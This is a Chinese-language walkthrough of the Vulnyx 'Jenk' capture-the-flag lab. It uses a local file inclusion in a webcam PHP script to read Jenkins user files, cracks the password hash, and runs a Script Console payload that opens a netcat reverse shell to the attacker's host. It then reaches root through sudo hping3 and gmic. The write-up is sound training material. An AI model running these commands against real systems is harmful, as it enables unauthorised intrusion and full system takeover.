Vulnyx-Jenk-Walkthrough

信息收集

服务探测

❯ sudo arp-scan -l
[sudo] password for Pepster:
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1    00:50:56:c0:00:08       VMware, Inc.
192.168.60.2    00:50:56:e3:f6:57       VMware, Inc.
192.168.60.238  08:00:27:0e:11:37       PCS Systemtechnik GmbH
192.168.60.254  00:50:56:f3:f4:8b       VMware, Inc.

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.070 seconds (123.67 hosts/sec). 4 responded
❯ export ip=192.168.60.238
❯ rustscan -a $ip
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
Port scanning: Because every port has a story to tell.

[~] The config file is expected to be at "/home/Pepster/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.238:22
Open 192.168.60.238:80
Open 192.168.60.238:8080
[~] Starting Script(s)
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-14 11:27 CST
Initiating ARP Ping Scan at 11:27
Scanning 192.168.60.238 [1 port]
Completed ARP Ping Scan at 11:27, 0.10s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 11:27
Completed Parallel DNS resolution of 1 host. at 11:27, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 11:27
Scanning 192.168.60.238 [3 ports]
Discovered open port 8080/tcp on 192.168.60.238
Discovered open port 80/tcp on 192.168.60.238
Discovered open port 22/tcp on 192.168.60.238
Completed SYN Stealth Scan at 11:27, 0.04s elapsed (3 total ports)
Nmap scan report for 192.168.60.238
Host is up, received arp-response (0.0015s latency).
Scanned at 2025-03-14 11:27:46 CST for 0s

PORT     STATE SERVICE    REASON
22/tcp   open  ssh        syn-ack ttl 64
80/tcp   open  http       syn-ack ttl 64
8080/tcp open  http-proxy syn-ack ttl 64
MAC Address: 08:00:27:0E:11:37 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.37 seconds
           Raw packets sent: 4 (160B) | Rcvd: 4 (160B)

枚举目录

得到/webcams

❯ gobuster dir -u "http://$ip" -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,zip,txt -b 404,403
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.60.238
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes:   404,403
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,html,zip,txt
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.html           (Status: 200) [Size: 10701]
/webcams              (Status: 301) [Size: 318] [--> http://192.168.60.238/webcams/]
Progress: 340379 / 1102800 (30.86%)^C
[!] Keyboard interrupt detected, terminating.
Progress: 342233 / 1102800 (31.03%)
===============================================================
Finished
===============================================================

是个摄像头的配置信息

❯ curl http://192.168.60.238/webcams/includecam.php\?cam\=cam1
<?xml version="1.0" encoding="UTF-8"?>
<camera>
  <hostname>cam1</hostname>
  <ipaddress>10.0.0.99</ipaddress>
  <port>8080</port>
  <password>c4m3r4</password>
</camera>

我猜测含有LFI文件包含，尝试利用此?cam参数，无果

同时在8080端口还开放了Jenkins服务

❯ whatweb -v $ip:8080
WhatWeb report for http://192.168.60.238:8080
Status    : 403 Forbidden
Title     : <None>
IP        : 192.168.60.238
Country   : RESERVED, ZZ

Summary   : Cookies[JSESSIONID.e6f0a594], HTTPServer[Jetty(10.0.13)], HttpOnly[JSESSIONID.e6f0a594], Jenkins[2.401.2], Jetty[10.0.13], Meta-Refresh-Redirect[/login?from=%2F], Script, UncommonHeaders[x-content-type-options,x-hudson,x-jenkins,x-jenkins-session]

Detected Plugins:
[ Cookies ]
        Display the names of cookies in the HTTP headers. The
        values are not returned to save on space.

        String       : JSESSIONID.e6f0a594

[ HTTPServer ]
        HTTP server header string. This plugin also attempts to
        identify the operating system from the server header.

        String       : Jetty(10.0.13) (from server string)

[ HttpOnly ]
        If the HttpOnly flag is included in the HTTP set-cookie
        response header and the browser supports it then the cookie
        cannot be accessed through client side script - More Info:
        http://en.wikipedia.org/wiki/HTTP_cookie

        String       : JSESSIONID.e6f0a594

[ Jenkins ]
        Jenkins is an application that monitors executions of
        repeated jobs, such as building a software project or jobs
        run by cron.

        Version      : 2.401.2
        Google Dorks: (1)
        Website     : http://jenkins-ci.org/

[ Jetty ]
        Jetty is a pure Java application server. Jetty provides an
        HTTP server, HTTP client, and javax.servlet container.

        Version      : 10.0.13
        Google Dorks: (1)
        Website     : http://jetty.codehaus.org/jetty/

[ Meta-Refresh-Redirect ]
        Meta refresh tag is a deprecated URL element that can be
        used to optionally wait x seconds before reloading the
        current page or loading a new page. More info:
        https://secure.wikimedia.org/wikipedia/en/wiki/Meta_refresh

        String       : /login?from=%2F

[ Script ]
        This plugin detects instances of script HTML elements and
        returns the script language/type.


[ UncommonHeaders ]
        Uncommon HTTP server headers. The blacklist includes all
        the standard headers and many non standard but common ones.
        Interesting but fairly common headers should have their own
        plugins, eg. x-powered-by, server and x-aspnet-version.
        Info about headers can be found at www.http-stats.com

        String       : x-content-type-options,x-hudson,x-jenkins,x-jenkins-session (from headers)

HTTP Headers:
        HTTP/1.1 403 Forbidden
        Date: Fri, 14 Mar 2025 03:27:52 GMT
        Connection: close
        X-Content-Type-Options: nosniff
        Set-Cookie: JSESSIONID.e6f0a594=node01wvd9qgontwmz1sdotihw47u340.node0; Path=/; HttpOnly
        Expires: Thu, 01 Jan 1970 00:00:00 GMT
        Content-Type: text/html;charset=utf-8
        X-Hudson: 1.395
        X-Jenkins: 2.401.2
        X-Jenkins-Session: 03c1a8ff
        Content-Length: 541
        Server: Jetty(10.0.13)

WhatWeb report for http://192.168.60.238:8080/login?from=%2F
Status    : 200 OK
Title     : Sign in [Jenkins]
IP        : 192.168.60.238
Country   : RESERVED, ZZ

Summary   : Cookies[JSESSIONID.e6f0a594], HTML5, HTTPServer[Jetty(10.0.13)], HttpOnly[JSESSIONID.e6f0a594], Jenkins[2.401.2], Jetty[10.0.13], PasswordField[j_password], UncommonHeaders[x-content-type-options,x-hudson,x-jenkins,x-jenkins-session,x-instance-identity], X-Frame-Options[sameorigin]

Detected Plugins:
[ Cookies ]
        Display the names of cookies in the HTTP headers. The
        values are not returned to save on space.

        String       : JSESSIONID.e6f0a594

[ HTML5 ]
        HTML version 5, detected by the doctype declaration


[ HTTPServer ]
        HTTP server header string. This plugin also attempts to
        identify the operating system from the server header.

        String       : Jetty(10.0.13) (from server string)

[ HttpOnly ]
        If the HttpOnly flag is included in the HTTP set-cookie
        response header and the browser supports it then the cookie
        cannot be accessed through client side script - More Info:
        http://en.wikipedia.org/wiki/HTTP_cookie

        String       : JSESSIONID.e6f0a594

[ Jenkins ]
        Jenkins is an application that monitors executions of
        repeated jobs, such as building a software project or jobs
        run by cron.

        Version      : 2.401.2
        Google Dorks: (1)
        Website     : http://jenkins-ci.org/

[ Jetty ]
        Jetty is a pure Java application server. Jetty provides an
        HTTP server, HTTP client, and javax.servlet container.

        Version      : 10.0.13
        Google Dorks: (1)
        Website     : http://jetty.codehaus.org/jetty/

[ PasswordField ]
        find password fields

        String       : j_password (from field name)

[ UncommonHeaders ]
        Uncommon HTTP server headers. The blacklist includes all
        the standard headers and many non standard but common ones.
        Interesting but fairly common headers should have their own
        plugins, eg. x-powered-by, server and x-aspnet-version.
        Info about headers can be found at www.http-stats.com

        String       : x-content-type-options,x-hudson,x-jenkins,x-jenkins-session,x-instance-identity (from headers)

[ X-Frame-Options ]
        This plugin retrieves the X-Frame-Options value from the
        HTTP header. - More Info:
        http://msdn.microsoft.com/en-us/library/cc288472%28VS.85%29.
        aspx

        String       : sameorigin

HTTP Headers:
        HTTP/1.1 200 OK
        Date: Fri, 14 Mar 2025 03:27:58 GMT
        Connection: close
        X-Content-Type-Options: nosniff
        Content-Type: text/html;charset=utf-8
        Expires: Thu, 01 Jan 1970 00:00:00 GMT
        Cache-Control: no-cache,no-store,must-revalidate
        X-Hudson: 1.395
        X-Jenkins: 2.401.2
        X-Jenkins-Session: 03c1a8ff
        X-Frame-Options: sameorigin
        Content-Encoding: gzip
        X-Instance-Identity: MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6qPbkwm/Lq2Osr70fsrpPlgwoNsgKcKdY3a8uJNrwzkzMNoB3pz1PKWqV5OItojSxVg1dkcf0dhS5OLv5Y4SpCPCioP/nfF0odo9GXMrrAvp4GCEhjDcU4tauk8DAv/pBiyxy5gpoJv9Ay1iVLOBZw2uoDAcFZgheAcN+gTeGEWoFvJ2+ED2dkWstmGvI5TnH2Uax9BkJmp7SBi5+08mkJeWXgWi15o8ul09okcJQTJNNgEIHHzTLhArCLloJ7GoaILCPaZuurUl9BEw1eMkNBijL9DVqyo+a7zxhWgFVXlwBEJC+KN8T1fCUzeqjaJgQgEVzKOrQb3Dnp1evpKwXwIDAQAB
        Set-Cookie: JSESSIONID.e6f0a594=node01aoao12kzvc5w1gkfplpibbq7g1.node0; Path=/; HttpOnly
        Content-Length: 706
        Server: Jetty(10.0.13)

观察Jenkins版本，尝试寻找版本漏洞

发现存在LFI任意文件读取漏洞CVE-2024-23897，不过没法成功利用

只能再次尝试在之前的cam上寻找入口点

LFI 文件包含

当你利用?cam=cam1去访问可以获取xml文件的内容，但你去通过?cam=cam1.xml去访问，则显示为空，猜测路径会自动拼接后缀xml

尝试读取Jenkins的xml文件

我们拿到了一个用户IDandrew_15328478385288074167

❯ curl http://192.168.60.238/webcams/includecam.php\?cam\=/var/lib/jenkins/users/users
<?xml version='1.1' encoding='UTF-8'?>
<hudson.model.UserIdMapper>
  <version>1</version>
  <idToDirectoryNameMap class="concurrent-hash-map">
    <entry>
      <string>andrew</string>
      <string>andrew_15328478385288074167</string>
    </entry>
  </idToDirectoryNameMap>
</hudson.model.UserIdMapper>%

得知此userid，再次读取用户个人配置

❯ curl http://192.168.60.238/webcams/includecam.php\?cam\=/var/lib/jenkins/users/andrew_15328478385288074167/config
<?xml version='1.1' encoding='UTF-8'?>
<user>
  <version>10</version>
  <id>andrew</id>
  <fullName>Andrew Miler</fullName>
  <properties>
    <com.cloudbees.plugins.credentials.UserCredentialsProvider_-UserCredentialsProperty plugin="[email protected]">
      <domainCredentialsMap class="hudson.util.CopyOnWriteMap$Hash"/>
    </com.cloudbees.plugins.credentials.UserCredentialsProvider_-UserCredentialsProperty>
    <hudson.plugins.emailext.watching.EmailExtWatchAction_-UserProperty plugin="[email protected]">
      <triggers/>
    </hudson.plugins.emailext.watching.EmailExtWatchAction_-UserProperty>
    <hudson.model.MyViewsProperty>
      <views>
        <hudson.model.AllView>
          <owner class="hudson.model.MyViewsProperty" reference="../../.."/>
          <name>all</name>
          <filterExecutors>false</filterExecutors>
          <filterQueue>false</filterQueue>
          <properties class="hudson.model.View$PropertyList"/>
        </hudson.model.AllView>
      </views>
    </hudson.model.MyViewsProperty>
    <org.jenkinsci.plugins.displayurlapi.user.PreferredProviderUserProperty plugin="[email protected]">
      <providerId>default</providerId>
    </org.jenkinsci.plugins.displayurlapi.user.PreferredProviderUserProperty>
    <hudson.model.PaneStatusProperties>
      <collapsed/>
    </hudson.model.PaneStatusProperties>
    <jenkins.security.seed.UserSeedProperty>
      <seed>df7162166260558b</seed>
    </jenkins.security.seed.UserSeedProperty>
    <hudson.search.UserSearchProperty>
      <insensitiveSearch>true</insensitiveSearch>
    </hudson.search.UserSearchProperty>
    <hudson.model.TimeZoneProperty/>
    <jenkins.model.experimentalflags.UserExperimentalFlagsProperty>
      <flags/>
    </jenkins.model.experimentalflags.UserExperimentalFlagsProperty>
    <hudson.security.HudsonPrivateSecurityRealm_-Details>
      <passwordHash>#jbcrypt:$2a$10$V.wxGyfowdGEVLvpQt5DROedmKKUp11g922/V.tb1xmi8eYe7rmzu</passwordHash>
    </hudson.security.HudsonPrivateSecurityRealm_-Details>
    <hudson.tasks.Mailer_-UserProperty plugin="[email protected]_e015e5">
      <emailAddress>[email protected]</emailAddress>
    </hudson.tasks.Mailer_-UserProperty>
    <jenkins.security.ApiTokenProperty>
      <tokenStore>
        <tokenList/>
      </tokenStore>
    </jenkins.security.ApiTokenProperty>
    <jenkins.security.LastGrantedAuthoritiesProperty>
      <roles>
        <string>authenticated</string>
      </roles>
      <timestamp>1689941739701</timestamp>
    </jenkins.security.LastGrantedAuthoritiesProperty>
  </properties>
</user>%

hash 爆破

得到密码hash#jbcrypt:$2a$10$V.wxGyfowdGEVLvpQt5DROedmKKUp11g922/V.tb1xmi8eYe7rmzu

尝试爆破一下，得到密码andrew1

❯ vi hash
❯ john hash --wordlist=/usr/share/wordlists/rockyou.txt --format=crypt
Using default input encoding: UTF-8
Loaded 1 password hash (crypt, generic crypt(3) [?/64])
Cost 1 (algorithm [1:descrypt 2:md5crypt 3:sunmd5 4:bcrypt 5:sha256crypt 6:sha512crypt]) is 4 for all loaded hashes
Cost 2 (algorithm specific iterations) is 10 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
andrew1          (#jbcrypt)
1g 0:00:00:09 DONE (2025-03-14 14:08) 0.1070g/s 92.50p/s 92.50c/s 92.50C/s football1..felipe
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

利用此用户凭证登录andrew:andrew1

在Manage Jenkins中执行Script Console利用payload反弹shell

println "nc -e /bin/bash 192.168.60.100 4444".execute().text

用户提权

监听一下端口

jenkins用户存在sudo权限可以执行hping3

❯ pwncat-cs -lp 4444
[14:19:09] Welcome to pwncat 🐈!                                                                                                       __main__.py:164
[14:19:10] received connection from 192.168.60.238:48334                                                                                    bind.py:84
[14:19:10] 192.168.60.238:48334: registered new host w/ db                                                                              manager.py:957
(local) pwncat$
(remote) jenkins@jenk:/var/lib/jenkins$ sudo -l
Matching Defaults entries for jenkins on jenk:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User jenkins may run the following commands on jenk:
    (andrew) NOPASSWD: /usr/sbin/hping3

正常提权

(remote) jenkins@jenk:/var/lib/jenkins$ sudo -u andrew /usr/sbin/hping3
hping3> /bin/bash
andrew@jenk:/var/lib/jenkins$ cd ~
andrew@jenk:~$ cat user.txt
0210bf1feef973181bfff9a28e845f71
andrew@jenk:~$ sudo -l
Matching Defaults entries for andrew on jenk:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User andrew may run the following commands on jenk:
    (root) NOPASSWD: /usr/bin/gmic

Root提权

利用gmic的exec参数执行shell命令

andrew@jenk:~$ sudo -l
Matching Defaults entries for andrew on jenk:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User andrew may run the following commands on jenk:
    (root) NOPASSWD: /usr/bin/gmic
andrew@jenk:~$ sudo /usr/bin/gmic -exec "bash"
[gmic]-0./ Start G'MIC interpreter.
[gmic]-0./ Execute external command 'bash' in verbose mode.
root@jenk:/home/andrew# id
uid=0(root) gid=0(root) grupos=0(root)
root@jenk:/home/andrew# cd ~
root@jenk:~# cat /root/root.txt
d02c2cc0136e5c3bcba433098f746e42